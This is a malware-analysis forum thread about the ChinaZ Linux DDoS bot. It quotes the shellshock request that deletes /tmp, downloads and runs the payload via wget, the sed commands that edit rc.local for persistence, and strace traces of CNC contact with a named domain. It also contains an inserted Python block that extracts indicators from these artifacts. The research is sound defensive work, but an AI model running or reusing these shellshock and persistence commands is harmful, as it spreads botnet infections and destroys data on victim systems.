A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24936  by unixfreaxjp
 Tue Jan 13, 2015 5:31 pm
The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Our initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via shellshock attacks:
/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
 /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
 http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 
The above request was reported to be generated by the Windows version of the shellshock scanner binary, with the below trace:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ (note: LOW detection)
.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                                         ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0
The ELF payload was served from a hacked Windows system running the HFS server:

The calls, subs and function names are obfuscated, yet some new, unique characteristics can be spotted, as below, for detection purposes:



Registration for autostart uses /etc/rc.local modification:
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local
It hammered SELinux, used hosts.conf, resolv.conf and libnss as the DNS resolver, and generated the backdoor as per below; note: not necessarily on a hostname basis.
SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, 
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("")}, [16]) 
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168
In this particular sample it calls the CNC at aa.gm352.com (at ASN 58543 | | CHINATELECOM-HUNAN-H
$ my_lookup aa.gm352.com
aa.gm352.com.           300     IN      A
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
$ mycnccheck
Connection to 9521 port [tcp/*] succeeded!

Due to the unique new shellshock infection pair (scanner + payload), the new functions and the new signature used, we consider this a new China DDoSer variant: "ChinaZ"
*) Threat found by B of MMD ELF Team
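The three artifacts quoted in the post above (the shellshock delivery request, the resolver traffic in the strace, and the rc.local edit) can each be turned into a check. The following is an added worked example, not code from the post, from MMD or from the malware: the sample inputs are constructed from the strings shown in the thread (the drop host is kept redacted as `xxxx:81` exactly as the post shows it, and the rc.local body is an assumed Debian-style default). It extracts the drop URL and file names from a shellshock header, decodes the DNS query/response bytes copied from the `send()`/`recvfrom()` lines to confirm the CNC hostname, and re-implements the two quoted `sed` commands to show what they leave behind in rc.local and how to flag it.

```python
"""IOC extraction for the ChinaZ artifacts quoted above (added example)."""
import re
import struct

# --- 1. Shellshock delivery request --------------------------------------
# Constructed header value, shaped like the scanner's .rdata format string.
SHELLSHOCK_HEADER = (
    '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://xxxx:81/9521 '
    '-O /tmp/China.Z-gxak >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;'
    'echo chmod 777 /tmp/China.Z-gxak >> /tmp/Run.sh;echo /tmp/China.Z-gxak '
    '>> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;'
    'chmod 777 /tmp/Run.sh;/tmp/Run.sh"'
)
BENIGN_HEADER = "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/34.0"

# CVE-2014-6271 trigger: an exported function body "() { ... }" followed by
# trailing commands that the vulnerable bash executes on import.
_SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{[^}]*\}\s*;\s*(?P<tail>.+)$", re.S)
_WGET_RE = re.compile(r"wget\s+(?P<url>\S+)\s+-O\s+(?P<out>\S+)")


def parse_shellshock(header_value):
    """Return extracted IOCs for a shellshock-style header, or None if benign."""
    m = _SHELLSHOCK_RE.match(header_value)
    if not m:
        return None
    tail = m.group("tail")
    iocs = {"trailing_command": tail, "drop_url": None,
            "dropped_file": None, "stager": None}
    w = _WGET_RE.search(tail)
    if w:
        iocs["drop_url"] = w.group("url")
        iocs["dropped_file"] = w.group("out")
    s = re.search(r">>\s*(\S+\.sh)", tail)   # the script the echos build
    if s:
        iocs["stager"] = s.group(1)
    return iocs


# --- 2. Resolver traffic from the strace ----------------------------------
# Bytes copied from the send()/recvfrom() lines in the post; strace's C-style
# escapes are valid Python byte escapes. The response is cut where strace
# truncated it (the "..."), which is just after the question section.
DNS_QUERY = b"cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1"
DNS_RESPONSE_HEAD = b"cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"


def decode_dns_question(raw):
    """Decode the 12-byte DNS header and the first question of a packet."""
    txid, flags, qd, an, ns, ar = struct.unpack("!6H", raw[:12])
    labels, off = [], 12
    while raw[off] != 0:                      # length-prefixed labels
        n = raw[off]
        labels.append(raw[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    qtype, qclass = struct.unpack("!HH", raw[off + 1:off + 5])
    return {"id": txid, "flags": flags, "qdcount": qd, "ancount": an,
            "nscount": ns, "arcount": ar, "qname": ".".join(labels),
            "qtype": qtype, "qclass": qclass,
            "is_response": bool(flags & 0x8000)}


# --- 3. /etc/rc.local persistence -----------------------------------------
# Assumed Debian-style default rc.local (constructed).
RC_LOCAL_CLEAN = "#!/bin/sh -e\n#\n# rc.local\n\nexit 0\n"


def apply_chinaz_sed(text):
    """Mimic: sed -i -e '/exit/d' FILE; sed -i -e '2 i//ChinaZ' FILE."""
    lines = [l for l in text.splitlines() if "exit" not in l]   # /exit/d
    if len(lines) >= 2:                                          # 2 i//ChinaZ
        lines.insert(1, "//ChinaZ")
    return "\n".join(lines) + "\n"


def rc_local_indicators(text):
    """Return the persistence indicators found in an rc.local body."""
    lines = text.splitlines()
    found = []
    if any(l.strip() == "//ChinaZ" for l in lines):
        found.append("chinaz_marker")
    if not any(l.strip().startswith("exit") for l in lines):
        found.append("exit_removed")
    return found


if __name__ == "__main__":
    print(parse_shellshock(SHELLSHOCK_HEADER))
    print(decode_dns_question(DNS_QUERY))
    print(decode_dns_question(DNS_RESPONSE_HEAD))
    print(rc_local_indicators(apply_chinaz_sed(RC_LOCAL_CLEAN)))
```

Decoding the query gives transaction id 0x634d, a single A question for aa.gm352.com and a 30-byte packet, matching the length in the `send()` line; the response header decodes to flags 0x8180 with one answer and five authority records, which is consistent with the five he.net NS records in the lookup output. Note that `//ChinaZ` is not a comment in `sh`, so the inserted line is itself a tell in the boot log, quite apart from the missing `exit 0`.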
 #24982  by unixfreaxjp
 Sat Jan 17, 2015 8:58 pm
The modular version of the ChinaZ in dynamic ELFs (w/shared libs).
Detection ratio is literally ZERO for these modules:
https://www.virustotal.com/en/file/b540 ... /analysis/
https://www.virustotal.com/en/file/a86b ... 421490630/
https://www.virustotal.com/en/file/daaa ... 421491358/

Analysis is in MMD blog: http://blog.malwaremustdie.org/2015/01/ ... ml#modular
Please credit #malwaremustdie for these findings.
 #24989  by unixfreaxjp
 Sun Jan 18, 2015 7:06 am
I am sorry to write this in the ELF thread; it is closely related to the post at http://www.kernelmode.info/forum/viewto ... 682#p24982
The Windows version of the ChinaZ client attacker was also spotted in a set of ELF samples.
I wrote the summary of my reversing in VT: https://www.virustotal.com/en/file/714e ... /analysis/
 #25132  by ilaloyka
 Mon Feb 02, 2015 12:01 pm
I don't get the malware shared by you. How do I get the malware? I'm sorry.
Hi, what does `DDosWorksServerEeCodeKey` at 8048194 mean?
 #26220  by unixfreaxjp
 Wed Jul 01, 2015 1:07 pm
The Linux/ChinaZ.DDoS binary builder for x32/x64 (and Win x32) is shared here for raising the detection ratio of the threat, for research and mitigation purposes.
WARNING! This is not a toy for fun but a crimeware tool. Using it online without proper handling can damage any service, will violate the law, and can cause your internet service to be blacklisted or worse, blocked, so the risk is all yours. Please analyze it in your test environment only.

Please read analysis in MalwareMustDie for the more info and the source of the threat: http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT=NULL: https://www.virustotal.com/en/file/59e6 ... /analysis/


Builder Interface:

Binary templates:

Binary ELF templates contain ChinaZ GitHub code:

We cannot share the Win32 template (N/A) and the CNC tools (forbidden by law; openly sharing them would go beyond the research category, and I could go to jail). Please contact me by PM with your details so the share can be recorded. Sorry for the bummer; please bear with the safety procedure. A snapshot of the CNC tool is in the MMD post, VT: https://www.virustotal.com/en/file/8b58 ... /analysis/

#MalwareMustDie's work, shared with the anti-malware community.
 #26494  by unixfreaxjp
 Tue Aug 11, 2015 6:52 am